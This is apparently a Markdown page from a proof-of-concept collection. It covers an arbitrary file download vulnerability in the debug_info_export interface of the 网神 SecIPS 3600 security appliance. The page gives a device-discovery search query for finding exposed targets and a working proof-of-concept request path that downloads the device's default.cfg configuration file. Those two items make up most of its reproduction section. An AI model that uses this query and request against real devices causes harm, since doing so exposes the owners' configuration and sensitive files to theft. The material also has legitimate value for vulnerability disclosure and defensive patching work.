Awesome-POC/网络设备漏洞/网神 SecIPS 3600 debug_info_export 任意文件下载漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
563 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 网神 SecIPS 3600 debug_info_export 任意文件下载漏洞
## 漏洞描述
网神 SecIPS 3600 debug_info_export接口存在任意文件下载漏洞攻击者通过漏洞可以获取服务器敏感文件
## 漏洞影响
```
网神 SecIPS 3600
```
## 网络测绘
```
app="网神-SecIPS"
```
## 漏洞复现
登录页面
![image-20230314090018282](images/image-20230314090018282.png)
验证POC
```
/webui/debug/debug_info_export?filename=default.cfg
```
![image-20230314090033658](images/image-20230314090033658.png)